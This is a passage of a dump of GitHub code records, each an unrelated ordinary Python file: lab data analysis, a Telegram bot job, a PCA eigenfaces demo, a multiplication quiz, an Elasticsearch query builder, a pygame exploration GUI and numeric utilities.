np.loadtxt('counttef59.txt')\ntreshtef5 = datatef5[:, 0]/205\ncounttef5 = datatef5[:, 1]\ndatatef5[:,0] = datatef5[:, 0]/205\n\n#CALCOLO BUIO\na1=np.ma.masked_greater_equal(data1[:,0], 0.5)\na2=np.ma.masked_greater_equal(data2[:,0], 0.5)\na3=np.ma.masked_greater_equal(data3[:,0], 0.5)\na4=np.ma.masked_greater_equal(data4[:,0], 0.5)\na5=np.ma.masked_greater_equal(data5[:,0], 0.5)\n\n\n\nb1=np.ma.masked_greater_equal(data1[:,0], 1.5)\nb2=np.ma.masked_greater_equal(data2[:,0], 1.5)\nb3=np.ma.masked_greater_equal(data3[:,0], 1.5)\nb4=np.ma.masked_greater_equal(data4[:,0], 1.5)\nb5=np.ma.masked_greater_equal(data5[:,0], 1.5)\n\n\n\nPct1=np.mean(data1[np.ma.getmask(b1),1])/np.mean(data1[np.ma.getmask(a1),1])\nPct2=np.mean(data2[np.ma.getmask(b2),1])/np.mean(data2[np.ma.getmask(a2),1])\nPct3=np.mean(data3[np.ma.getmask(b3),1])/np.mean(data3[np.ma.getmask(a3),1])\nPct4=np.mean(data4[np.ma.getmask(b4),1])/np.mean(data4[np.ma.getmask(a4),1])\nPct5=np.mean(data5[np.ma.getmask(b5),1])/np.mean(data5[np.ma.getmask(a5),1])\n\nprint('Pct1=',Pct1)\nprint('Pct2=',Pct2)\nprint('Pct3=',Pct3)\nprint('Pct4=',Pct4)\nprint('Pct5=',Pct5)\n\n\n#CALCOLO CON TEFLON\n\n\nalfa1=np.ma.masked_greater_equal(datatef1[:,0], 0.5)\nalfa2=np.ma.masked_greater_equal(datatef2[:,0], 0.5)\nalfa3=np.ma.masked_greater_equal(datatef3[:,0], 0.5)\nalfa4=np.ma.masked_greater_equal(datatef4[:,0], 0.5)\nalfa5=np.ma.masked_greater_equal(datatef5[:,0], 0.5)\n\n\n\nbeta1=np.ma.masked_greater_equal(datatef1[:,0], 1.5)\nbeta2=np.ma.masked_greater_equal(datatef2[:,0], 1.5)\nbeta3=np.ma.masked_greater_equal(datatef3[:,0], 1.5)\nbeta4=np.ma.masked_greater_equal(datatef4[:,0], 1.5)\nbeta5=np.ma.masked_greater_equal(datatef5[:,0], 1.5)\n\n\n\nPcttef1=np.mean(datatef1[np.ma.getmask(beta1),1])/np.mean(datatef1[np.ma.getmask(alfa1),1])\nPcttef2=np.mean(datatef2[np.ma.getmask(beta2),1])/np.mean(datatef2[np.ma.getmask(alfa2),1])\nPcttef3=np.mean(datatef3[np.ma.getmask(beta3),1])/np.mean(datatef3[np.ma.getmask(alfa3),1])\nPcttef4=np.mean(datatef4[np.ma.getmask(beta4),1])/np.mean(datatef4[np.ma.getmask(alfa4),1])\nPcttef5=np.mean(datatef5[np.ma.getmask(beta5),1])/np.mean(datatef5[np.ma.getmask(alfa5),1])\n\nprint('Pcttef1=',Pcttef1)\nprint('Pcttef2=',Pcttef2)\nprint('Pcttef3=',Pcttef3)\nprint('Pcttef4=',Pcttef4)\nprint('Pcttef5=',Pcttef5)\n\n\nplt.yscale('log')\nplt.ylabel('Counts')\nplt.xlabel('Threshold[mV]')\n\nplt.plot(data1[np.ma.getmask(a1),0],data1[np.ma.getmask(a1),1],label='55 V')\nplt.plot(data2[np.ma.getmask(a2),0],data2[np.ma.getmask(a2),1],label='56 V')\nplt.plot(data3[np.ma.getmask(a3),0],data3[np.ma.getmask(a3),1],label='57 V')\nplt.plot(data4[np.ma.getmask(a4),0],data4[np.ma.getmask(a4),1],label='58 V')\nplt.plot(data5[np.ma.getmask(a5),0],data5[np.ma.getmask(a5),1],label='59 V')\nplt.legend(loc=\"upper right\")\n\n\nplt.scatter(data1[np.ma.getmask(a1),0],data1[np.ma.getmask(a1),1],label='55 V')\nplt.scatter(data2[np.ma.getmask(a2),0],data2[np.ma.getmask(a2),1],label='56 V')\nplt.scatter(data3[np.ma.getmask(a3),0],data3[np.ma.getmask(a3),1],label='57 V')\nplt.scatter(data4[np.ma.getmask(a4),0],data4[np.ma.getmask(a4),1],label='58 V')\nplt.scatter(data5[np.ma.getmask(a5),0],data5[np.ma.getmask(a5),1],label='59 V')\n\nplt.show()\n\n\nplt.yscale('log')\nplt.ylabel('Counts')\nplt.xlabel('Threshold[mV]')\n\n\nplt.plot(datatef1[np.ma.getmask(alfa1),0],datatef1[np.ma.getmask(alfa1),1],label='55 V')\nplt.plot(datatef2[np.ma.getmask(alfa2),0],datatef2[np.ma.getmask(alfa2),1],label='56 
V')\nplt.plot(datatef3[np.ma.getmask(alfa3),0],datatef3[np.ma.getmask(alfa3),1],label='57 V')\nplt.plot(datatef4[np.ma.getmask(alfa4),0],datatef4[np.ma.getmask(alfa4),1],label='58 V')\nplt.plot(datatef5[np.ma.getmask(alfa5),0],datatef5[np.ma.getmask(alfa5),1],label='59 V')\nplt.legend(loc=\"upper right\")\n\n\nplt.scatter(datatef1[np.ma.getmask(alfa1),0],datatef1[np.ma.getmask(alfa1),1],label='55 V')\nplt.scatter(datatef2[np.ma.getmask(alfa2),0],datatef2[np.ma.getmask(alfa2),1],label='56 V')\nplt.scatter(datatef3[np.ma.getmask(alfa3),0],datatef3[np.ma.getmask(alfa3),1],label='57 V')\nplt.scatter(datatef4[np.ma.getmask(alfa4),0],datatef4[np.ma.getmask(alfa4),1],label='58 V')\nplt.scatter(datatef5[np.ma.getmask(alfa5),0],datatef5[np.ma.getmask(alfa5),1],label='59 V')\n\n\nplt.show()","repo_name":"francescouni0/FisMedLab","sub_path":"Sipm/CrossTalk.py","file_name":"CrossTalk.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8838536465","text":"#!/usr/bin/env python3\n\nimport os\n\nimport telebot\n\nfrom logger import init_logger\nfrom utils.utils import get_project_names_list, get_all_fans_count\nfrom set_vars import set_vars\nset_vars()\n\njobs_logger = init_logger('jobs logger')\n\ntoken = os.environ.get('BOT_TOKEN')\nCHAT_ID = os.environ.get('CHAT_ID')\njobs_logger.info('envinron variables received')\n\nbot = telebot.TeleBot(token)\n\n\nclass Job(object):\n @staticmethod\n def get_all_fans_job():\n jobs_logger.info(\"job started\")\n project_names_list = get_project_names_list()\n result = get_all_fans_count(project_names_list)\n # result = ['Сейчас', '12 часов', 'дня']\n for message in result:\n bot.send_message(CHAT_ID, message)\n jobs_logger.info(\"job done\")\n\n\nif __name__ == '__main__':\n Job.get_all_fans_job()\n","repo_name":"LuckCky/counterbot","sub_path":"scheduler_job.py","file_name":"scheduler_job.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11149520766","text":"\"\"\"\nA utility function for av related tasks.\n\"\"\"\n\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport networkx as nx\n\n\ndef get_onh_radius(av_data_set):\n return np.linalg.norm(av_data_set.get_graph('onh')[0] - av_data_set.get_graph('onh_pos'))\n\n\ndef get_av_nodes_positions(av_data_set=None, vessel=\"\", av_only=True):\n node_marker = av_data_set.get_graph(vessel)\n av_radius = 2.5 * get_onh_radius(av_data_set)\n xc, yc = av_data_set.get_graph('onh_pos')[0]\n for ix, node in enumerate(av_data_set.get_graph('V')):\n x, y = node\n if node_marker[ix] != 1:\n continue\n if ((x - xc) ** 2 + (y - yc) ** 2) < av_radius ** 2 or not av_only:\n yield node\n\n\ndef show_av_graph(av_data_set=None, image_array=None, image_show=True, onh_show=True, av_only=True, gray_scale=None):\n onh = av_data_set.get_graph('onh')\n av_art = np.array(list(get_av_nodes_positions(av_data_set, vessel=\"art\", av_only=av_only)))\n av_ven = np.array(list(get_av_nodes_positions(av_data_set, vessel=\"ven\", av_only=av_only)))\n\n av_art = np.ceil(av_art)\n av_ven = np.ceil(av_ven)\n\n plt.scatter(av_art[:, 0], av_art[:, 1], color='red', s=4.0)\n plt.scatter(av_ven[:, 0], av_ven[:, 1], color='blue', s=4.0)\n\n if onh_show:\n plt.plot(onh[:, 0], onh[:, 1], color='green')\n\n if image_show:\n plt.imshow(Image.fromarray(image_array), aspect='auto', cmap=gray_scale)\n plt.show()\n\n\ndef 
show_graph(adj_matrix, node_pos=None, node_color='red', edge_color='black'):\n graph = nx.from_scipy_sparse_matrix(adj_matrix)\n nx.draw_networkx(graph, pos=node_pos, edge_color=edge_color, node_color=node_color, with_labels=False, node_size=4,\n width=0.5)\n plt.show()\n\n\ndef color_artery(x): return x == 1 and 'r' or 'b'\n\n\ndef color_vein(x): return x == 1 and 'b' or 'r'\n\n\ndef color_av(a, v):\n if a == 1 and v == 1:\n return 'g'\n if a == 1 and v == 0:\n return 'b'\n if a == 0 and v == 1:\n return 'r'\n return 'g'","repo_name":"saeidmotevali/trackernet","sub_path":"utils/av_utils.py","file_name":"av_utils.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70229192413","text":"#### A from-scratch demonstration of the eigenfaces application of PCA using NumPy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_lfw_people\n\ndef run(numpca=150):\n\n faces = fetch_lfw_people(min_faces_per_person=60)\n print(faces.images.shape)\n# print(faces.target_names)\n\n#Step 1\n faces_mean=faces.data-np.mean(faces.data,axis=0)\n\n#Step 2\n cov=np.matmul(faces_mean.T,faces_mean)\n\n#Step 3\n eig_val,eig_vec=np.linalg.eigh(cov)\n\n#Step 4 \n indices=np.argsort(eig_val)[::-1]\n eig_val=eig_val[indices]\n eig_vec=eig_vec[:,indices]\n\n#Step 5\n n_comp=numpca\n eig_vec=eig_vec[:,:n_comp]\n eig_valtot=eig_val\n eig_val=eig_val[:n_comp]\n\n pca_components=((faces_mean).dot(eig_vec)) \n\n\n### Plotting the Eigenvectors\n fig, axes = plt.subplots(3, 8, figsize=(9, 4),\n subplot_kw={'xticks':[], 'yticks':[]},\n gridspec_kw=dict(hspace=0.1, wspace=0.1))\n for i, ax in enumerate(axes.flat):\n ax.imshow(eig_vec[:,i].reshape(62,47),cmap='bone')\n \n\n plt.show()\n\n############\n\n\n### Plotting the contribution of each PC to the total variance\n totvar=np.sum(eig_valtot)\n\n explained_var_ratio=eig_valtot/totvar\n\n#Computing the Cumulative Variance of each eigenvector/PC\n\n cumul_sum_eigval=np.cumsum(explained_var_ratio)\n plt.bar(range(0,len(explained_var_ratio)),explained_var_ratio,alpha=0.5,align='center',label='Individual Explained Variance',color='orange' )\n plt.step(range(0,len(cumul_sum_eigval)),cumul_sum_eigval,where='mid',label='Cumulative Explained Variance',linewidth=3.0)\n\n plt.xlabel('number of components')\n plt.ylabel('cumulative explained variance');\n plt.xlim(-5,n_comp)\n plt.ylim(0,1.0)\n plt.tight_layout()\n plt.legend(loc='best')\n plt.show()\n\n############\n \n \n#Step 6 \n pca_inverse_transform=pca_components.dot(eig_vec.T)+np.mean(faces.data,axis=0)\n\n\n#### Plotting the Real Images and PC-Projected Images\n fig, ax = plt.subplots(2, 10, figsize=(10, 2.5),\n subplot_kw={'xticks':[], 'yticks':[]},\n gridspec_kw=dict(hspace=0.1, wspace=0.1))\n for i in range(10):\n ax[0, i].imshow(faces.data[i].reshape(62, 47), cmap='binary_r')\n ax[1, i].imshow(pca_inverse_transform[i].reshape(62, 47), cmap='binary_r')\n \n ax[0, 0].set_ylabel('full-dim\\ninput')\n ax[1, 0].set_ylabel(str(numpca)+'-dim\\nreconstruction');\n\n plt.show()\n","repo_name":"thaynecurrie/phys7943_fall2023","sub_path":"ScientificPythonNotes/NumPy/code/eigenfaces_np.py","file_name":"eigenfaces_np.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"16527955088","text":"import random\r\nimport webbrowser\r\n\r\ndef provjeri_tablicu():\r\n # Unos broja pitanja od korisnika\r\n 
broj_pitanja = int(input(\"Unesite broj pitanja za provjeru (do 100): \"))\r\n # u slučaju da je unešen broj pitanja veći od 100\r\n # broj pitanja se postavlja kao 100 jer tablica množenja\r\n # ima 100 pitanja\r\n broj_pitanja = min(broj_pitanja, 100)\r\n\r\n tablica = list(range(1, 11)) # lista brojeva za izbor\r\n pitanja = [] # Lista za pohranu pitanja\r\n n_odgovori = [] # Lista za pohranu netočnih odgovora\r\n\r\n # Generiranje nasumičnih pitanja\r\n while len(pitanja) < broj_pitanja:\r\n X = random.choice(tablica)\r\n Y = random.choice(tablica)\r\n pitanje = f\"{X} * {Y} = \"\r\n if (pitanje, X * Y) not in pitanja:\r\n pitanja.append((pitanje, X * Y))\r\n\r\n # Provjera znanja\r\n while n_odgovori or pitanja:\r\n if not pitanja:\r\n pitanja = n_odgovori.copy()\r\n n_odgovori = []\r\n print(\"**************************************\")\r\n print(\"Ispitivanje za brojeve koje nisi znao:\")\r\n\r\n pitanje, odgovor = pitanja.pop(0)\r\n korisnikov_odgovor = input(pitanje)\r\n if int(korisnikov_odgovor) != odgovor:\r\n n_odgovori.append((pitanje, odgovor))\r\n\r\n print(\"****************\")\r\n print(\"***BRAVOOOO*****\")\r\n print(\"****************\")\r\n # kao nagradu otvara stranicu sa matematičkim igricama ili neki drugi link\r\n webbrowser.open('https://mathgames.com')\r\nprovjeri_tablicu()\r\n","repo_name":"DinoIsanovic/tablica-mnozenja","sub_path":"tablica.py","file_name":"tablica.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4225482191","text":"# https://leetcode.com/submissions/detail/718457400/\r\n# Date of Submission: 2022-06-09\r\n\r\n# Runtime: 38 ms, faster than 76.09% of Python3 online submissions for Reverse Integer.\r\n# Memory Usage: 13.8 MB, less than 96.91% of Python3 online submissions for Reverse Integer.\r\n\r\nclass Solution:\r\n def reverse(self, x: int) -> int:\r\n \r\n reversed = \"\"\r\n signFlag = 0\r\n x = str(x)\r\n if (x[0] == \"-\"):\r\n signFlag = 1\r\n x = x[1:]\r\n #check overflow cases\r\n if (len(x) == 10):\r\n firstDigit = int(x[-1])\r\n temp = x[-2::-1]\r\n if(firstDigit > 1 and int(temp) > 147483647 and signFlag == 0):\r\n return 0\r\n elif(firstDigit > 1 and int(temp) > 147483648 and signFlag == 1):\r\n return 0\r\n #normal case \r\n reversed = x[::-1]\r\n if(signFlag):\r\n reversed = \"-\" + reversed\r\n return int(reversed)","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/0007-Reverse_Integer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32024219355","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='atomsk',\n version='0.0.4',\n author='Théo Bequet',\n author_email='theo.bequet@etu.univ-poitiers.fr',\n description='Toolbox for atomistic simulation',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/theobqt/python_toolbox',\n project_urls = {\n \"Bug Tracker\": \"https://github.com/theobqt/python_toolbox/issues\"\n },\n license='',\n packages=['atomsk'],\n install_requires=['requests'],\n)","repo_name":"theobqt/python_toolbox","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"23915765798","text":"import abc\nimport re\nfrom datetime import date\nfrom enum import Enum, unique\nfrom typing import Dict, List, Union\n\nimport elasticsearch\n\n\nclass SearchEngineInterface(abc.ABC):\n \"\"\"\n Interface to abstract the interaction with the index system\n \"\"\"\n\n @abc.abstractmethod\n def search(self, query: Dict, index: str = \"\", timeout: int = 30) -> Dict:\n \"\"\"\n Searches the index with the provided elasticsearch_dsl.Search\n \"\"\"\n\n @abc.abstractmethod\n def index_exists(self, index: str) -> bool:\n \"\"\"\n Checks if a specific index exists\n \"\"\"\n\n\nclass ElasticSearch(SearchEngineInterface):\n def __init__(self, host: str, default_index: str = \"\"):\n self._es = elasticsearch.Elasticsearch(hosts=[host])\n self._default_index = default_index\n\n def search(self, query: Dict, index: str = \"\", timeout: int = 30) -> Dict:\n index_name = self._get_index_name(index)\n response = self._es.search(\n index=index_name, body=query, request_timeout=timeout\n )\n return response\n\n def index_exists(self, index: str) -> bool:\n return self._es.indices.exists(index=index)\n\n def _get_index_name(self, index: str) -> str:\n index_name = index if self._is_valid_index_name(index) else self._default_index\n if not self.index_exists(index_name):\n raise Exception(f'Index \"{index_name}\" does not exist')\n return index_name\n\n def _is_valid_index_name(self, index: str) -> bool:\n return isinstance(index, str) and len(index) > 0\n\n\nclass QueryBuilderInterface(abc.ABC):\n @abc.abstractmethod\n def build_query(self, **kwargs) -> Dict:\n \"\"\"\n Method to build queries using functionalities provided by the adequate mixins\n \"\"\"\n\n\nclass BoolQueryMixin:\n def build_bool_query(\n self,\n must: List[Dict] = [],\n should: List[Dict] = [],\n filter: List[Dict] = [],\n must_not: List[Dict] = [],\n ) -> Union[Dict, None]:\n if must == should == filter == must_not == []:\n return\n\n return {\n \"bool\": {\n \"must\": must,\n \"should\": should,\n \"filter\": filter,\n \"must_not\": must_not,\n }\n }\n\n\nclass MatchNoneQueryMixin:\n def build_match_none_query(self) -> Dict:\n return {\"match_none\": {}}\n\n\nclass MatchAllQueryMixin:\n def build_match_all_query(self) -> Dict:\n return {\"match_all\": {}}\n\n\nclass DateRangeQueryMixin:\n def build_date_range_query(\n self,\n field: str,\n since: Union[date, None] = None,\n until: Union[date, None] = None,\n ) -> Union[Dict, None]:\n if since is None and until is None:\n return\n\n date_range_query = {field: {}}\n if since is not None:\n date_range_query[field][\"gte\"] = since.isoformat()\n if until is not None:\n date_range_query[field][\"lte\"] = until.isoformat()\n\n return {\"range\": date_range_query}\n\n\nclass TermsQueryMixin:\n def build_terms_query(self, field: str, terms: List[str] = []) -> Union[Dict, None]:\n if terms != []:\n return {\"terms\": {field: terms}}\n\n\nclass SimpleStringQueryMixin:\n def build_simple_query_string_query(\n self, querystring: str, fields: List[str] = [], exact_field_suffix: str = \"\"\n ) -> Union[Dict, None]:\n if querystring == \"\":\n return\n\n clean_querystring = self._preprocess_querystring(querystring)\n return {\n \"simple_query_string\": {\n \"query\": clean_querystring,\n \"fields\": fields,\n \"quote_field_suffix\": exact_field_suffix,\n }\n }\n\n def _preprocess_querystring(self, querystring: str) -> str:\n return self._translate_curly_text_to_straight(querystring)\n\n def _translate_curly_text_to_straight(self, text: str) -> str:\n 
translated_double = re.sub(r\"[“”]\", r'\"', text)\n translated_single = re.sub(r\"[‘’]\", r\"'\", translated_double)\n return translated_single\n\n\nclass RankFeatureQueryMixin:\n def build_rank_feature_query(self, field: str):\n return {\"rank_feature\": {\"field\": field}}\n\n\n@unique\nclass FieldSortOrder(str, Enum):\n DESCENDING = \"desc\"\n ASCENDING = \"asc\"\n\n\nclass SortMixin:\n def add_sorts(self, query: Dict, sorts: List[Dict] = []) -> None:\n if sorts != []:\n query[\"sort\"] = sorts\n\n def build_sort(self, field: str, order: FieldSortOrder) -> Dict:\n return {field: {\"order\": order.value}}\n\n\nclass PaginationMixin:\n def add_pagination_fields(\n self,\n query: Dict,\n offset: Union[int, None] = None,\n size: Union[int, None] = None,\n ) -> None:\n if offset is not None:\n query[\"from\"] = offset\n\n if size is not None:\n query[\"size\"] = size\n\n\nclass HighlightMixin:\n def add_highlight(self, query: Dict, fields_highlights: List[Dict] = [],) -> None:\n if fields_highlights == []:\n return\n\n highlight = {\"highlight\": {\"fields\": {}}}\n for field_highlight in fields_highlights:\n highlight[\"highlight\"][\"fields\"].update(field_highlight)\n\n query.update(highlight)\n\n def build_field_highlight(\n self,\n field: str,\n fragment_size: Union[int, None] = None,\n number_of_fragments: Union[int, None] = None,\n pre_tags: List[str] = [],\n post_tags: List[str] = [],\n type: str = \"unified\",\n matched_fields: List[str] = [],\n ) -> Dict:\n field_highlight = {\n \"pre_tags\": pre_tags,\n \"post_tags\": post_tags,\n \"type\": type,\n }\n\n if fragment_size is not None:\n field_highlight[\"fragment_size\"] = fragment_size\n\n if number_of_fragments is not None:\n field_highlight[\"number_of_fragments\"] = number_of_fragments\n\n if type == \"fvh\" and matched_fields:\n field_highlight[\"matched_fields\"] = matched_fields\n\n return {field: field_highlight}\n\n\ndef create_search_engine_interface(\n host: str = \"\", default_index: str = \"\"\n) -> SearchEngineInterface:\n if not isinstance(host, str) or len(host.strip()) == 0:\n raise Exception(\"Missing host\")\n if not isinstance(default_index, str):\n raise Exception(\"Invalid index name\")\n return ElasticSearch(host.strip(), default_index=default_index.strip())\n","repo_name":"okfn-brasil/querido-diario-api","sub_path":"index/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"32"} +{"seq_id":"42183695683","text":"import pygame\nfrom Domain.constants import *\nfrom controller import *\nfrom random import randint\nimport time\n\nclass GUI:\n\n def __init__(self):\n # We position on a random area on the map the drone\n # x = randint(START, END)\n x = 2\n y = 4\n # y = randint(START, END)\n self.__controller = Controller(x, y)\n\n\n def initializeMainScreen(self):\n screen = pygame.display.set_mode(MAIN_WINDOW)\n screen.fill(WHITE)\n\n screen.blit(self.__controller.getEnvironment().image(), FULL_BLIT)\n pygame.display.flip()\n return screen\n\n\n def initializeStartScreen(self):\n screen = pygame.display.set_mode(START_WINDOW)\n screen.fill(WHITE)\n\n # add background image\n background = pygame.image.load(\"nyanstart2.png\")\n screen.blit(background, FULL_BLIT)\n\n # add font\n pygame.font.init()\n font = pygame.font.SysFont('comicsans', START_FONT)\n image = font.render('Explore the galaxy!', True, NAVYBLUE)\n\n # draw the button\n pygame.draw.rect(screen, WHITE, POSITION_BUTTON, 
border_radius = BORDER)\n pygame.draw.rect(screen, BLACK, POSITION_BUTTON, 2, border_radius= BORDER)\n screen.blit(image, BLIT_START_FONT)\n pygame.display.flip()\n return screen\n\n\n def initializeGame(self):\n\n # initialize the pygame module\n pygame.init()\n\n # load and set the logo\n logo = pygame.image.load(\"nyanlogo.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Interstellar travel\")\n\n # add music\n pygame.mixer.init()\n pygame.mixer.music.load(\"nyan.mp3\")\n pygame.mixer.music.play(MUSIC_REPEAT, MUSIC_REPEAT)\n\n\n def start(self):\n\n self.initializeGame()\n screen = self.initializeStartScreen()\n\n start = True\n runningMain = False\n\n # start screen\n while start:\n # event handling, gets all event from the event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n start = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if START_BUTTON <= pygame.mouse.get_pos()[MOUSE_WIDTH_POS] <= END_BUTTON_WIDTH:\n if START_BUTTON <= pygame.mouse.get_pos()[MOUSE_HEIGHT_POS] <= END_BUTTON_HEIGHT:\n # Exist the current loop and enter the MAIN WINDOW\n screen = self.initializeMainScreen()\n runningMain = True\n start = False\n\n\n # main screen\n while runningMain:\n # event handling, gets all event from the event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n runningMain = False\n\n # We move the spaceship one step using DFS\n self.__controller.moveDSF()\n time.sleep(SLEEP)\n\n if self.__controller.getDroneX() is None and self.__controller.getDroneY() is None:\n runningMain = False\n else:\n self.__controller.markDetectedWalls()\n screen.blit(self.__controller.getDMapImage(), DMAP_BLIT)\n pygame.display.flip()\n\n pygame.quit()\n\n","repo_name":"AlexandraBledea/Sem4-AI","sub_path":"Assignments/Lab1/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33849126021","text":"#We can Import previously created functions or modules for use by using the following commands:\r\n#Note that they need to be on the same level as the ones where we are trying to import them.\r\n#Some examples are the following:\r\nfrom py_day_test import some_rando, make_messages\r\n\r\nfrom py_day_mod.make_messages import MessageUser\r\n\r\nfrom random.whatever import anything\r\n\r\n#Then we can continue adding values.\r\n#An example is after loading the previous exercise from 9 Converting Function to Class we can continue to import users:\r\nobj = MessageUser()\r\nobj.add_user(\"Abc\", 123.32, email='hello@teamcfe.com')\r\nobj.add_user(\"jOhn\", 94.23)\r\nobj.add_user(\"Sean\", 93.23)\r\nobj.add_user(\"Emilee\", 193.23)\r\nobj.add_user(\"Marie\", 13.23)\r\nobj.get_details()\r\n\r\nprint(obj.make_messages())\r\n\r\n","repo_name":"Kokkalo4/Python-Learning-Project","sub_path":"10 Importing to Python.py","file_name":"10 Importing to Python.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16153848813","text":"from __future__ import division\nfrom itertools import chain\nfrom collections import OrderedDict, Iterator, defaultdict\n\nimport numpy as np\n\n__all__ = ['round_any', 'min_max', 'match',\n 
'precision', 'first_element', 'multitype_sort',\n 'is_close_to_int', 'same_log10_order_of_magnitude',\n 'identity'\n ]\n\nDISCRETE_KINDS = 'ObUS'\nCONTINUOUS_KINDS = 'ifuc'\n\nSECONDS = OrderedDict([\n ('ns', 1e-9), # nanosecond\n ('us', 1e-6), # microsecond\n ('ms', 1e-3), # millisecond\n ('s', 1), # second\n ('m', 60), # month\n ('h', 3600), # hour\n ('d', 24*3600), # day\n ('w', 7*24*3600), # week\n ('M', 31*24*3600), # month\n ('y', 365*24*3600), # year\n])\n\nNANOSECONDS = OrderedDict([\n ('ns', 1), # nanosecond\n ('us', 1e3), # microsecond\n ('ms', 1e6), # millisecond\n ('s', 1e9), # second\n ('m', 60e9), # month\n ('h', 3600e9), # hour\n ('d', 24*3600e9), # day\n ('w', 7*24*3600e9), # week\n ('M', 31*24*3600e9), # month\n ('y', 365*24*3600e9), # year\n])\n\n\ndef round_any(x, accuracy, f=np.round):\n \"\"\"\n Round to multiple of any number.\n \"\"\"\n x = np.asarray(x)\n return f(x / accuracy) * accuracy\n\n\ndef min_max(x, nan_rm=False, finite=True):\n \"\"\"\n Return the minimum and maximum of x\n\n Parameters\n ----------\n x : array_like\n Sequence\n nan_rm : bool\n Whether to remove ``nan`` values.\n finite : bool\n Whether to consider only finite values.\n\n Returns\n -------\n out : tuple\n (minimum, maximum) of x\n \"\"\"\n x = np.asarray(x)\n if nan_rm and finite:\n x = x[np.isfinite(x)]\n elif nan_rm:\n x = x[~np.isnan(x)]\n elif finite:\n x = x[~np.isinf(x)]\n\n if (len(x)):\n return np.min(x), np.max(x)\n else:\n return float('-inf'), float('inf')\n\n\ndef match(v1, v2, nomatch=-1, incomparables=None, start=0):\n \"\"\"\n Return a vector of the positions of (first)\n matches of its first argument in its second.\n\n Parameters\n ----------\n v1: array_like\n Values to be matched\n\n v2: array_like\n Values to be matched against\n\n nomatch: int\n Value to be returned in the case when\n no match is found.\n\n incomparables: array_like\n Values that cannot be matched. Any value in ``v1``\n matching a value in this list is assigned the nomatch\n value.\n start: int\n Type of indexing to use. Most likely 0 or 1\n \"\"\"\n v2_indices = {}\n for i, x in enumerate(v2):\n if x not in v2_indices:\n v2_indices[x] = i\n\n v1_to_v2_map = [nomatch] * len(v1)\n skip = set(incomparables) if incomparables else set()\n for i, x in enumerate(v1):\n if x in skip:\n continue\n\n try:\n v1_to_v2_map[i] = v2_indices[x] + start\n except KeyError:\n pass\n\n return v1_to_v2_map\n\n\ndef precision(x):\n \"\"\"\n Return the precision of x\n\n Parameters\n ----------\n x : array_like | numeric\n Value(s) whose for which to compute the precision.\n\n Returns\n -------\n out : numeric\n The precision of ``x`` or that the values in ``x``.\n\n Notes\n -----\n The precision is computed in base 10.\n\n Examples\n --------\n >>> precision(0.08)\n 0.01\n >>> precision(9)\n 1\n >>> precision(16)\n 10\n \"\"\"\n from .bounds import zero_range\n\n rng = min_max(x, nan_rm=True)\n if zero_range(rng):\n span = np.abs(rng[0])\n else:\n span = np.diff(rng)[0]\n\n if span == 0:\n return 1\n else:\n return 10 ** int(np.floor(np.log10(span)))\n\n\ndef first_element(obj):\n \"\"\"\n Return the first element of `obj`\n\n Parameters\n ----------\n obj : iterable\n Should not be an iterator\n\n Returns\n -------\n out : object\n First element of `obj`. 
Raise a class:`StopIteration`\n exception if `obj` is empty.\n \"\"\"\n if isinstance(obj, Iterator):\n raise RuntimeError(\n \"Cannot get the first element of an iterator\")\n return next(iter(obj))\n\n\ndef multitype_sort(a):\n \"\"\"\n Sort elements of multiple types\n\n x is assumed to contain elements of different types, such that\n plain sort would raise a `TypeError`.\n\n Parameters\n ----------\n a : array-like\n Array of items to be sorted\n\n Returns\n -------\n out : list\n Items sorted within their type groups.\n \"\"\"\n types = defaultdict(list)\n numbers = {int, float, complex}\n\n for x in a:\n t = type(x)\n if t in numbers:\n types['number'].append(x)\n else:\n types[t].append(x)\n\n for t in types:\n types[t] = np.sort(types[t])\n\n return list(chain(*(types[t] for t in types)))\n\n\ndef nearest_int(x):\n \"\"\"\n Return nearest long integer to x\n \"\"\"\n if x == 0:\n return np.int64(0)\n elif x > 0:\n return np.int64(x + 0.5)\n else:\n return np.int64(x - 0.5)\n\n\ndef is_close_to_int(x):\n \"\"\"\n Check if value is close to an integer\n\n Parameters\n ----------\n x : float\n Numeric value to check\n\n Returns\n -------\n out : bool\n \"\"\"\n if not np.isfinite(x):\n return False\n return abs(x - nearest_int(x)) < 1e-10\n\n\ndef 